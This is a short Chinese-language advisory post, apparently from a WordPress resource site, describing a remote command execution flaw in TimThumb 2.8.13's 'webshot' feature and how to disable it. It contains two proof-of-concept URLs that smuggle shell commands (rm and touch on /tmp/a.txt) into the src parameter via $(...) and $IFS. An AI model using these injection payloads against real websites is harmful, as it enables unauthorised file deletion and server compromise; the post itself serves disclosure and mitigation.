
TimThumb WordPress的插件版本2.8.13发现的重大弱点,就在于它的“ Webshot “功能启用时,允许攻击者在远程网站上执行命令。
该漏洞允许攻击者远程受影响的网站上执行任意PHP代码。一旦PHP代码已经被执行,该网站很可能被破坏的攻击者想要的方式。到现在为止,没有任何可用于漏洞补丁。
“ 用一个简单的命令,攻击者可以创建,删除和修改服务器上的任何文件“安全专家说。
使用下面的命令,黑客可以创建,删除和修改服务器上的任何文件:
http://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php?webshot=1&src=http://vulnerablesite.com/$(rm$IFS/tmp/a.txt)
http://vulnerablesite.com/wp-content/plugins/pluginX/timthumb.php??webshot=1&src=http://vulnerablesite.com/$(touch$IFS/tmp/a.txt)
检查和禁用TIMTHUMB“WEBSHOT”
你的主题或插件目录找到 timthumb.php,搜索“WEBSHOT_ENABLED“
如果发现值为 true 如:(’WEBSHOT_ENABLED’,true)
请将该值设置为“false“,即(’WEBSHOT_ENABLED’,false)
本站除原创内容,其余内容均收集自互联网,仅限用于学习和研究目的,本站不对其内容的合法性、可用性承担任何责任。本站禁止以任何形式发布或转载任何违法相关信息,若您发现请立即向站长举报;用户投稿一切资源内容不代表本站立场,并不代表本站赞同其观点和对其真实性负责。
如有版权内容,其版权均归原作者所有,本站虽力求保存原有版权信息,但因众多资源经多次转载,已无法确定其真实来源,故敬请原作者谅解!为尊重作者劳动成果,请购买正版支持作者,谢谢!若您对「HULIKU.COM」所载资源作品版权归属存有异议,请发送邮箱:ihuliku@qq.com 进行处理。
本站资源文件大多存储至云盘,如您发现图片或链接失效,请联系站长或作者,我们将及时进行更新。资源都是经过站长或作者收集测试优化后进行发布分享。如若转载请在贵站文内以超链形式注明狐狸库文章出处,谢谢合作!













![WordPress子比主题美化教程合集[2023/04/17]-狐狸库](https://huliku.com/pic/2023032607024935.png)
![狐狸库自定义子比主题底部footer页脚美化(自适应)[06.26]更新-狐狸库](https://huliku.com/pic/2023062610013835.png)






















请登录后查看评论内容